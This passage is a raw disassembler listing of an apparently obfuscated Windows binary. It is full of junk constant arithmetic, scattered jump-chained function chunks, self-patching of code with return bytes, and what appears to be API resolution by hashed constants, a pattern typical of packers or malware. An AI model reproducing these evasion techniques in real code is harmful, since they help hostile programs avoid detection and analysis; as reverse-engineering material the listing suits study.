; ---------------------------------------------------------------------------

loc_43F62F:				; CODE XREF: hvvrg7ie:0043A760j
		pop	edx
		xor	eax, 0ECC901B3h
		and	eax, 0FD2C8507h
		or	eax, 0AB0D318Bh
		add	eax, 0A9A0695Bh
		add	eax, ebp
		add	eax, 9B326516h
		mov	eax, [eax]
		jmp	loc_452D06
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_43F657:				; CODE XREF: sub_44C8FB+EDC1j
		jnz	loc_456B1D
		jmp	loc_44D491
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_43F662:				; CODE XREF: sub_43FC15-5EABj
		jz	loc_459DEA
		jmp	loc_451BC2
; END OF FUNCTION CHUNK	FOR sub_43FC15
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_383. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F66E:				; CODE XREF: hvvrg7ie:loc_43A65Bj
					; hvvrg7ie:00445FF9j
		add	ecx, 41976BECh
		xchg	ecx, [esp]
		jmp	loc_45A060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43F67C:				; CODE XREF: sub_43EB47-26C7j
		sub	edi, 0C62FF2ABh
		and	edi, 5AAB19C1h
		add	edi, 0EE437C79h
		jmp	loc_43B5B2
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
		mov	[ecx], edi
		jnb	loc_4396CB
		jmp	sub_445FD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B334

loc_43F6A0:				; CODE XREF: sub_45B334-9DD4j
		mov	esi, edx
		xchg	esi, [esp+4+var_4]
		push	0B39195ADh
		pop	edx
		and	edx, 0F9EFA2D2h
		jmp	loc_45A666
; END OF FUNCTION CHUNK	FOR sub_45B334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B2AC

loc_43F6B6:				; CODE XREF: sub_45B2AC:loc_458EA4j
		call	sub_44973C
		mov	eax, [esp+0]
		jmp	loc_43C52D
; END OF FUNCTION CHUNK	FOR sub_45B2AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43F6C3:				; CODE XREF: sub_44BCAE:loc_4407BAj
		sub	eax, 1D8D101Dh
		ror	eax, 5
		push	esi
		push	7D14AED0h
		pop	esi
		rol	esi, 13h
		jmp	loc_442D91
; END OF FUNCTION CHUNK	FOR sub_44BCAE

; =============== S U B	R O U T	I N E =======================================



sub_43F6DB	proc near		; DATA XREF: sub_454463-173Eo

; FUNCTION CHUNK AT 0043B4EB SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00449139 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B60F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456292 SIZE 0000000A BYTES

		cmp	byte ptr [eax],	0
		jnz	loc_456292
		mov	eax, [ebp-8]
		mov	byte ptr [eax],	0
		mov	esp, ebp
		jmp	loc_449139
sub_43F6DB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F6F1:				; CODE XREF: hvvrg7ie:00451083j
		jbe	loc_449971
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_43F6F7:				; CODE XREF: sub_44C1F3:loc_43FAA3j
		xor	edx, 0A9C11753h
		rol	edx, 11h
		add	edx, 0E6EE6D2Eh
		xchg	edx, [esp+0]
		push	0D15988F5h
		pop	eax
		sub	eax, 0F5360F3Ch
		jmp	loc_43DEF0
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4442B9

loc_43F71A:				; CODE XREF: sub_4442B9+11j
		add	eax, 5C7B4F26h
		or	eax, 8395B07Fh
		xor	eax, 1662F095h
		add	eax, ebp
		add	eax, 2240B7A6h
		popf
		push	eax
		jmp	loc_43B7AC
; END OF FUNCTION CHUNK	FOR sub_4442B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451697

loc_43F73B:				; CODE XREF: sub_451697:loc_446611j
		pop	edx
		add	edx, 81455395h
		or	edx, 1FBD75F5h
		rol	edx, 18h
		add	edx, 403175C3h
		call	sub_44E34F
; END OF FUNCTION CHUNK	FOR sub_451697
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43F756:				; CODE XREF: sub_442FD1-54D6j
		jmp	nullsub_166
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43F75B:				; CODE XREF: sub_43B3BE:loc_44FA99j
		add	eax, 85ACA98Ch
		add	eax, ebp
		add	eax, 436CE93Eh
		mov	eax, [eax]
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		inc	dword ptr [ebp-8]
		cmp	dword ptr [ebp-8], 19h
		jmp	loc_44932F
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
		mov	eax, 0CB39536Bh
		call	sub_450C5A
		mov	ds:off_41D08C, eax
		lea	eax, sub_43D910
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D910
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43F79D:				; CODE XREF: hvvrg7ie:loc_43E6E0j
					; sub_442FD1:loc_43F593j
		xor	edx, edx

loc_43F79F:				; CODE XREF: hvvrg7ie:loc_456E04j
		push	edx
		push	eax

loc_43F7A1:				; CODE XREF: hvvrg7ie:loc_43B77Cj
		mov	eax, [ebp-18h]
		push	offset loc_4581CF
		jmp	nullsub_81
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_43F7AE	proc near		; DATA XREF: hvvrg7ie:0043AF42o
		mov	eax, ds:dword_43CD84
		or	eax, eax
		jnz	loc_447022
		jmp	loc_45829A
sub_43F7AE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_43F7C1:				; CODE XREF: sub_4540B2:loc_4540C2j
		add	eax, [ebp-4]
		xor	edx, edx
		push	edx
		push	ebx
		jmp	loc_4390B3
; END OF FUNCTION CHUNK	FOR sub_4540B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_43F7CD:				; CODE XREF: sub_44191F:loc_43E8A3j
					; sub_43D47E:loc_456B6Bj
		add	esi, 830CE762h
		xchg	esi, [esp-8+arg_4]
		jmp	sub_4500E7
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------

loc_43F7DB:				; CODE XREF: hvvrg7ie:0044C969j
		mov	eax, 726FC43Ah
		call	sub_450C5A
		mov	ds:off_41D0AC, eax
		lea	eax, loc_43D64E
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D64E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45196D

loc_43F7F9:				; CODE XREF: sub_45196D:loc_43F011j
		call	sub_43E507

loc_43F7FE:				; CODE XREF: hvvrg7ie:0044F9EEj
		jmp	loc_442813
; END OF FUNCTION CHUNK	FOR sub_45196D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_43F803:				; CODE XREF: sub_441FE4+659Bj
		jmp	loc_44A5C6
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------

loc_43F808:				; CODE XREF: hvvrg7ie:0044FA2Cj
		shr	ebx, 1Dh
		and	ebx, 401E416Dh
		jmp	loc_453232
; ---------------------------------------------------------------------------
		push	4CE47AD6h
		ja	loc_453032
		jmp	sub_45128D
; ---------------------------------------------------------------------------

loc_43F826:				; DATA XREF: hvvrg7ie:0044B090o
		push	ecx
		push	edi
		mov	edi, ebx
		xchg	edi, [esp]
		push	eax
		shr	ebx, 16h
		jz	loc_452518
		sbb	ecx, edx
		jmp	loc_4541E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43F83E:				; CODE XREF: sub_43B3BE:loc_448038j
		sbb	edi, 0B05D98B4h
		sbb	edx, 196F7C3Ch
		sub	esi, 0D366B242h
		jmp	loc_43E435
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_43F855:				; CODE XREF: sub_444BE1+6B8Aj
		jz	loc_45900C
		jmp	loc_456257
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------

loc_43F860:				; CODE XREF: hvvrg7ie:004593CCj
		adc	ecx, 3FFA3780h
		xchg	ebx, edi
		jmp	sub_443E65
; ---------------------------------------------------------------------------

loc_43F86D:				; CODE XREF: hvvrg7ie:0045631Fj
					; hvvrg7ie:loc_45A9F0j
		push	0CBE8E635h
		pop	eax
		sub	eax, 4D67D9EAh
		and	eax, ds:4000F5h
		xor	eax, 268004EBh
		call	sub_457C82
		jmp	loc_43B14A
; ---------------------------------------------------------------------------

loc_43F88F:				; CODE XREF: hvvrg7ie:0044A92Cj
		js	loc_453F42
		jmp	loc_450B2F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43F89A:				; CODE XREF: sub_44191F+3496j
		cmp	ecx, 0B3F39B20h
		jmp	loc_44BE0F
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_285. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F8A6:				; CODE XREF: hvvrg7ie:0044130Fj
		jmp	loc_43DFB1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43F8AB	proc near		; CODE XREF: sub_43B248j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044AEE4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BD61 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044CB18 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044FDAC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450F35 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453A47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004547CE SIZE 0000001A BYTES

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		mov	esp, ebp
		jmp	loc_44CB18
sub_43F8AB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_43F8BB:				; CODE XREF: sub_442301:loc_45872Bj
		sub	edx, 0D7900689h

loc_43F8C1:				; CODE XREF: sub_45B048-21CAFj
		xor	edx, 0FF06384Bh
		js	loc_43DB0E

loc_43F8CD:				; CODE XREF: hvvrg7ie:004546DDj
		jmp	loc_4566A3
; END OF FUNCTION CHUNK	FOR sub_442301
; ---------------------------------------------------------------------------
		pop	edi
		jmp	loc_43DB00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43F8D8:				; CODE XREF: sub_446D8D:loc_44724Dj
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jnz	loc_43E081
		sub	al, 99h
		jmp	loc_450FCC
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A003

loc_43F8F0:				; CODE XREF: sub_45A003-1579Dj
		mov	eax, 0F2B89A19h
		push	edi
		push	0A60F1D61h
		pop	edi
		sub	edi, 0FF53AAEDh
		jmp	loc_43F428
; END OF FUNCTION CHUNK	FOR sub_45A003

; =============== S U B	R O U T	I N E =======================================



sub_43F907	proc near		; DATA XREF: sub_4504E0:loc_441FC7o

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C94E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044426C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004465DB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A55D SIZE 0000000C BYTES

		push	ebx
		xchg	ebx, [esp+4+var_4]
		mov	edx, ebx
		pop	ebx
		rol	eax, 1Eh
		jmp	loc_44426C
sub_43F907	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F916:				; CODE XREF: hvvrg7ie:loc_4497EFj
					; hvvrg7ie:00455034j
		add	eax, 0BB65D366h
		and	eax, 0BD3ACAB3h
		xor	eax, 0B1EF4638h

loc_43F928:				; CODE XREF: hvvrg7ie:loc_45AE6Bj
		push	esi
		pushf
		push	0A7741415h
		xchg	edx, [esp]
		mov	esi, edx
		jmp	loc_451B84
; ---------------------------------------------------------------------------
		jmp	ds:off_41D0F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_43F93F:				; CODE XREF: sub_439190+4B5Ej
					; sub_44CB41+1Ej ...
		pop	edx
		jnb	loc_442244
		mov	eax, [esp-8+arg_4]
		push	offset sub_44C81F
		jmp	nullsub_104
; END OF FUNCTION CHUNK	FOR sub_44955C

; =============== S U B	R O U T	I N E =======================================



sub_43F953	proc near		; DATA XREF: sub_440C05+E816o

; FUNCTION CHUNK AT 00457F90 SIZE 00000005 BYTES

		add	ecx, 11C0CDF2h
		xchg	ecx, [esp+0]
		jmp	loc_457F90
sub_43F953	endp

; ---------------------------------------------------------------------------
		mov	ds:dword_41D0E0, eax
		lea	eax, nullsub_510
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_510
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		jmp	loc_456330
; ---------------------------------------------------------------------------
		jo	loc_44D61E
; START	OF FUNCTION CHUNK FOR sub_44B69F

loc_43F985:				; CODE XREF: sub_44B69F:loc_45841Ej
		not	ebp
		jmp	sub_4396C7
; END OF FUNCTION CHUNK	FOR sub_44B69F

; =============== S U B	R O U T	I N E =======================================



sub_43F98C	proc near		; CODE XREF: sub_439E23p
					; hvvrg7ie:loc_45624Dj	...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D208 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044278C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442D7F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00444AE4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044684B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448225 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004501DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F0D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004525F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452849 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A114 SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		js	loc_452849

loc_43F998:				; CODE XREF: hvvrg7ie:loc_4477FAj
		mov	eax, [esp+0]
		call	sub_44363B

loc_43F9A0:				; CODE XREF: sub_454451+48C2j
		jmp	loc_44278C
sub_43F98C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F9A5:				; CODE XREF: hvvrg7ie:00443033j
		jmp	nullsub_494
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F9AB:				; CODE XREF: hvvrg7ie:00452FF2j
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B863

loc_43F9B0:				; CODE XREF: sub_45B863+1Aj
		pop	esi
		and	esi, 0F8F8A5A6h
		add	esi, 0A8EBBF3Ah
		and	esi, 0CBE09562h
		xor	esi, 2721D199h
		add	edx, esi
		pop	esi
		jmp	loc_43940E
; END OF FUNCTION CHUNK	FOR sub_45B863
; ---------------------------------------------------------------------------

loc_43F9D1:				; CODE XREF: hvvrg7ie:00439EDBj
		test	edx, eax
		jmp	loc_44429B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454703

loc_43F9D8:				; CODE XREF: sub_454703+14j
		jnz	loc_43C4A2
		lea	edx, [ebp-14h]
		mov	eax, offset dword_453890
		call	sub_456DE7
		lea	eax, [ebp-14h]
		push	eax
		call	sub_43A87E

loc_43F9F4:				; CODE XREF: sub_4546F5:loc_44C9ABj
		call	sub_443345
; END OF FUNCTION CHUNK	FOR sub_454703
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_43F9F9:				; CODE XREF: sub_43E063:loc_44E02Cj
		jmp	loc_439799
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_43F9FE:				; CODE XREF: hvvrg7ie:0043EDE6j
		jmp	loc_44E905

; =============== S U B	R O U T	I N E =======================================



sub_43FA03	proc near		; CODE XREF: hvvrg7ie:0043F0C4j
					; hvvrg7ie:0044FCB1p
		xchg	edx, [esp+0]
		pop	edx
		push	esi
		push	0B20D442h
		pop	esi
		xor	esi, 0C89A98Ah
		rol	esi, 13h
sub_43FA03	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43FA17:				; CODE XREF: sub_440C05:loc_43BAD1j
		add	esi, 0FF254A20h
		jmp	loc_45514A
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_43FA22:				; CODE XREF: sub_44BFF5:loc_45A9CEj
		cmp	dword ptr [ebp-4], 0
		jnz	loc_45758E
		jmp	loc_445292
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_43FA31:				; CODE XREF: sub_451D60-185E5j
		add	ebx, 82851C44h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_43ADE7
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
		jmp	ds:off_41D09C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_43FA45:				; CODE XREF: sub_451D60:loc_43ADE7j
					; sub_45269F:loc_4526AFj ...
		pop	edx
		jnb	loc_4526FC
		mov	eax, [esp+0]
		push	edx
		jmp	loc_445BC5
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442E42

loc_43FA55:				; CODE XREF: sub_442E42+Aj
		xchg	ebx, [esp+0]
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_442E42
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_313. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456E27

loc_43FA5E:				; CODE XREF: sub_456E27-8703j
		jmp	loc_4445BA
; END OF FUNCTION CHUNK	FOR sub_456E27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446ED4

loc_43FA63:				; CODE XREF: sub_446ED4+Dj
		jmp	nullsub_58
; END OF FUNCTION CHUNK	FOR sub_446ED4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43FA68:				; CODE XREF: sub_448BC0:loc_44354Cj
		mov	ebx, ebp
		pushf
		cmp	ecx, eax
		jmp	loc_444ACC
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
		call	sub_4538F3
		call	sub_44980B
; START	OF FUNCTION CHUNK FOR sub_43B788

loc_43FA7C:				; CODE XREF: sub_43B788+14j
		jmp	nullsub_37
; END OF FUNCTION CHUNK	FOR sub_43B788
; ---------------------------------------------------------------------------

loc_43FA81:				; CODE XREF: hvvrg7ie:004581AEj
		mov	[ebx], ebp

; =============== S U B	R O U T	I N E =======================================



sub_43FA83	proc near		; CODE XREF: sub_43F227:loc_449FA4p

; FUNCTION CHUNK AT 0043E9E0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004400F9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440489 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457C70 SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_444E49

loc_43FA8C:				; CODE XREF: sub_43EB47+1596j
					; sub_440643+C357j ...
		mov	dword ptr [ebp-8], 1
		jmp	loc_4400F9
sub_43FA83	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43FA98	proc near		; CODE XREF: sub_4403D4:loc_442DC8p
					; sub_45541B-1228Dp ...

; FUNCTION CHUNK AT 00442203 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447606 SIZE 0000000A BYTES

		jo	sub_45B036
		jmp	loc_442203
sub_43FA98	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_43FAA3:				; CODE XREF: sub_44C1F3:loc_446339j
		jnb	loc_43F6F7
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43FAA9:				; CODE XREF: sub_44191F-644Aj
		jmp	loc_43ADEC
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		or	edx, esi
		jmp	loc_451081
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_43FAB5:				; CODE XREF: sub_44616F-CD41j
					; hvvrg7ie:0044D28Fj
		and	edi, 1BD5B09Ah
		test	edi, 4000000h
		jmp	loc_440C82
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		test	ecx, 392B285Dh
		jmp	loc_44FF42
; ---------------------------------------------------------------------------

loc_43FAD1:				; CODE XREF: hvvrg7ie:0043FD76j
		and	ebp, 751263F5h
		sub	ebp, 3A9ACC11h

loc_43FADD:				; CODE XREF: hvvrg7ie:loc_44A0F4j
		mov	eax, [esp]
		push	ebx
		push	eax
		pop	ebx
		xchg	ebx, [esp]
		jmp	loc_44CADF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_43FAEB:				; CODE XREF: sub_44D4EF-6372j
		xchg	eax, [esp+4+var_4]
		mov	ebp, eax
		xchg	ebx, [esp+4+var_4]
		mov	eax, ebx
		jmp	loc_459747
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43FAFA:				; CODE XREF: sub_450F97-8523j
		ror	ebx, 1Bh
		jmp	loc_455948
; ---------------------------------------------------------------------------

loc_43FB02:				; CODE XREF: sub_450F97+65B9j
		sub	al, 99h
		push	29C03886h
		pop	edx
		and	edx, 238BFF0h
		jmp	loc_43E5D1
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E484

loc_43FB15:				; CODE XREF: sub_43E484+155A5j
		rol	esi, 12h
		jmp	loc_45AAFB
; END OF FUNCTION CHUNK	FOR sub_43E484
; ---------------------------------------------------------------------------
		ror	esi, 3
		jmp	sub_448DE4

; =============== S U B	R O U T	I N E =======================================



sub_43FB25	proc near		; CODE XREF: sub_44242E+2p
					; hvvrg7ie:004556FCj

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044E638 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045427B SIZE 00000018 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0E6F6C53Dh

loc_43FB2E:				; CODE XREF: hvvrg7ie:00450B1Bj
		pop	esi
		jmp	loc_45427B
sub_43FB25	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, [edi]
		jnb	loc_43CF77
		jmp	sub_456E27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_43FB41:				; CODE XREF: sub_4589D3:loc_45184Bj
		jle	loc_443E27
		ror	ecx, 6

loc_43FB4A:				; CODE XREF: hvvrg7ie:0043CAD1j
					; hvvrg7ie:004418A9j ...
		jmp	loc_43A82D
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------

loc_43FB4F:				; CODE XREF: hvvrg7ie:00448347j
					; hvvrg7ie:loc_4531DBj
		xchg	edx, [esp]

loc_43FB52:				; CODE XREF: hvvrg7ie:loc_4585DCj
		mov	ecx, edx
		pop	edx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_43FB57:				; CODE XREF: hvvrg7ie:0043CC2Fj
		jmp	loc_43C587
; ---------------------------------------------------------------------------

loc_43FB5C:				; CODE XREF: hvvrg7ie:00457635j
		push	ebp
		push	edx
		pop	ebp
		xchg	ebp, [esp]
		call	sub_455751
		jmp	loc_4571CD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0D0

loc_43FB6D:				; CODE XREF: sub_43C0D0+9j
		jmp	sub_453E08
; END OF FUNCTION CHUNK	FOR sub_43C0D0
; ---------------------------------------------------------------------------

loc_43FB72:				; DATA XREF: sub_440402+1EC5o
		add	eax, [ebp-4]
		push	offset loc_451217
		jmp	loc_455F1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451176

loc_43FB7F:				; CODE XREF: sub_451176:loc_4532DAj
		call	sub_43E854
		call	sub_43E26C

loc_43FB89:				; CODE XREF: sub_455087+51A8j
		jmp	loc_44102D
; END OF FUNCTION CHUNK	FOR sub_451176
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_43FB8E:				; CODE XREF: sub_44B1C6:loc_45AFD6j
		call	sub_450C5A
		call	sub_454B5C
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; START	OF FUNCTION CHUNK FOR sub_44440B

loc_43FB98:				; CODE XREF: sub_44440B+10j
		jmp	loc_451EE9
; END OF FUNCTION CHUNK	FOR sub_44440B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_43FB9D:				; CODE XREF: sub_44E34F:loc_44EE1Ej
		jnz	loc_45540B
		jmp	loc_45A3AC
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_43FBA8:				; CODE XREF: sub_44E3B3:loc_44CA0Bj
		jz	loc_4408E9
		jmp	loc_454792
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

loc_43FBB3:				; DATA XREF: sub_444C9C:loc_43B310o
		or	eax, eax
		jnz	loc_44402A
		jmp	loc_43FEB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43FBC0:				; CODE XREF: sub_454099+564Dj
		xor	eax, 948FD34Bh
		add	eax, 0B27A59FDh
		rol	eax, 0Ch
		xor	eax, 2914B140h
		xchg	eax, [esp-4+arg_0]
		jmp	loc_44AC09
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43FBDD:				; CODE XREF: sub_44191F+11j
					; sub_450FF2-3383j
		rol	edx, 1Eh
		cmp	edx, 0FCAC8879h
		jmp	loc_4508F0
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, edi
		xchg	ebp, [esp]
		push	offset sub_458591
		jmp	locret_446BD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_43FBFB:				; CODE XREF: sub_43B3BE:loc_447A17j
		inc	dword ptr [ebp-8]
		cmp	dword ptr [ebp-8], 19h
		jnz	loc_44C4F0
		jmp	loc_4492C7
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF52

loc_43FC0D:				; CODE XREF: hvvrg7ie:0043F624j
					; sub_43AF52:loc_4470C0j ...
		xchg	ebp, [esp+4+var_4]
		push	ebp
		pop	ecx
		pop	ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43AF52

; =============== S U B	R O U T	I N E =======================================



sub_43FC15	proc near		; CODE XREF: sub_4396C7+Ap
					; sub_43D910:loc_43B494p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439D4E SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043BD19 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F662 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004405EC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441DC2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00442A0C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443020 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B453 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B862 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D3D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D437 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E797 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450E9A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451BC2 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00451EE3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454323 SIZE 00000011 BYTES
